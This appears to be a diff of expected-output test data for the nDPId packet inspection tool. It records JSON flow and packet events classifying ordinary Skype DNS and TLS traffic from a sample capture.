00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1431970634723,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1431970634723,"pkt":"PBXCt3IO0NQSxnP1CABFAACYAABAAEARtuHAqAEBwKgBIgA14V4AhKxSjTWBgAABAAAAAQAADkRCM01TR1I1MDExNzA5B2dhdGV3YXkJbWVzc2VuZ2VyBGxpdmUDY29tAAAcAAHALQAGAAEAAAbhADUDbnMxBG1zZnQDbmV0AAZtc25oc3QJbWljcm9zb2Z0wDJ4Gz7uAAAcIAAAA4QAJOoAAAAOEA=="} -00811{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431970634669,"flow_last_seen":1431970634723,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1431970634723,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57694,"dst_port":53,"l4_proto":"udp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"db3msgr5011709.gateway.messenger.live.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00811{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431970634669,"flow_last_seen":1431970634723,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1431970634723,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57694,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"db3msgr5011709.gateway.messenger.live.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634728,"flow_last_seen":1431970634728,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970634728,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51229,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1431970634728,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970634728,"pkt":"0NQSxnP1PBXCt3IOCABFAABADqBAAEAGmPnAqAEinTg0HMgdnEkK2QRYAAAAALAC\/\/9q8wAAAgQFtAEDAwUBAQgKPjGHIQAAAAAEAgAA"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634728,"flow_last_seen":1431970634728,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970634728,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62875,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1431970634728,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970634728,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/L\/oAAEARx0DAqAEiwKgBAfWbADUAK9VUuF8BAAABAAAAAAAABWRzbjEzAWQFc2t5cGUDbmV0AAABAAE="} 
-00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634728,"flow_last_seen":1431970634728,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970634728,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62875,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"dsn13.d.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634728,"flow_last_seen":1431970634728,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970634728,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62875,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"dsn13.d.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634729,"flow_last_seen":1431970634729,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970634729,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59113,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1431970634729,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970634729,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/lFMAAEARYufAqAEiwKgBAebpADUAK335A20BAAABAAAAAAAABWRzbjEzAWQFc2t5cGUDbmV0AAAcAAE="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634729,"flow_last_seen":1431970634729,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970634729,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59113,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"dsn13.d.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634729,"flow_last_seen":1431970634729,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970634729,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59113,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"dsn13.d.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634729,"flow_last_seen":1431970634729,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970634729,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1431970634729,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970634729,"pkt":"0NQSxnP1PBXCt3IOCABFAABAt4dAAEAGpVrAqAEinTh+08geAbsxSRU0AAAAALAC\/\/+DfQAAAgQFtAEDAwUBAQgKPjGHIQAAAAAEAgAA"} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634730,"flow_last_seen":1431970634730,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970634730,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57592,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1431970634730,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970634730,"pkt":"0NQSxnP1PBXCt3IOCABFAABLIWAAAEAR1c7AqAEiwKgBAeD4ADUANz9NJ5kBAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDExAXIFc2t5cGUDbmV0AAABAAE="} -00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634730,"flow_last_seen":1431970634730,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970634730,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57592,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst11.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634730,"flow_last_seen":1431970634730,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970634730,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57592,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst11.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634731,"flow_last_seen":1431970634731,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970634731,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":53372,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1431970634731,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970634731,"pkt":"0NQSxnP1PBXCt3IOCABFAABL+hcAAEAR\/RbAqAEiwKgBAdB8ADUAN25j7f4BAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDExAXIFc2t5cGUDbmV0AAAcAAE="} 
-00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634731,"flow_last_seen":1431970634731,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970634731,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":53372,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst11.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634731,"flow_last_seen":1431970634731,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970634731,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":53372,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst11.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1431970634805,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431970634805,"pkt":"PBXCt3IO0NQSxnP1CABFAAA4BUNAAHYGIaedOH7TwKgBIgG7yB4Nim5XMUkVNZASIABVdAAAAgQFrAQCCAoZLZ4CPjGHIQ=="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1431970634805,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970634805,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0\/VlAAEAGX5TAqAEinTh+08geAbsxSRU1DYpuWIAQ\/\/+P3gAAAQEICj4xh20ZLZ4C"} -00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970634729,"flow_last_seen":1431970634832,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431970634832,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970634729,"flow_last_seen":1431970634832,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431970634832,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1431970634933,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970634933,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtJ2dODQcwKgBIpxJyB3uE3m5CtkEWaASOJCk1gAAAgQFrAQCCApMX+pXPjGHIQEDAwk="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1431970634934,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970634934,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0Qp9AAEAGZQbAqAEinTg0HMgdnEkK2QRZ7hN5uoAQECz7NQAAAQEICj4xh+xMX+pX"} 
-01404{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1431970634729,"flow_last_seen":1431970634990,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3792,"flow_avg_l4_payload_len":421,"midstream":0,"thread_ts_msec":1431970634990,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.gateway.messenger.live.com,*.beta.gateway.edge.messenger.live.com,*.by2.gateway.edge.messenger.live.com,*.sn1.gateway.edge.messenger.live.com","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"5e4e5596180ebd0ac0317125ee490707","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT SSL SHA2","subjectDN":"CN=*.gateway.messenger.live.com","fingerprint":"95:C4:07:41:85:D4:EF:AA:D9:1F:0F:1F:3C:08:BF:8E:8B:D0:90:51"}} +01404{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1431970634729,"flow_last_seen":1431970634990,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3792,"flow_avg_l4_payload_len":421,"midstream":0,"thread_ts_msec":1431970634990,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.gateway.messenger.live.com,*.beta.gateway.edge.messenger.live.com,*.by2.gateway.edge.messenger.live.com,*.sn1.gateway.edge.messenger.live.com","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"5e4e5596180ebd0ac0317125ee490707","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT SSL SHA2","subjectDN":"CN=*.gateway.messenger.live.com","fingerprint":"95:C4:07:41:85:D4:EF:AA:D9:1F:0F:1F:3C:08:BF:8E:8B:D0:90:51"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970635325,"flow_last_seen":1431970635325,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970635325,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63514,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1431970635325,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970635325,"pkt":"0NQSxnP1PBXCt3IOCABFAAA657QAAEARD4vAqAEiwKgBAfgaADUAJptGWcsBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"} 
-00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970635325,"flow_last_seen":1431970635325,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970635325,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63514,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"ui.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970635325,"flow_last_seen":1431970635325,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970635325,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63514,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"ui.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1431970635375,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970635375,"pkt":"0NQSxnP1PBXCt3IOCABFAABA4MoAAEARFm\/AqAEiwKgBAdb0ADUALMTUeDABAAABAAAAAAAAAWEGY29uZmlnBXNreXBlA2NvbQAAAQAB"} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1431970635375,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970635375,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWkkAAEARnPDAqAEiwKgBAf3LADUALKDXdTsBAAABAAAAAAAAAWEGY29uZmlnBXNreXBlA2NvbQAAHAAB"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970635433,"flow_last_seen":1431970635433,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431970635433,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63661,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
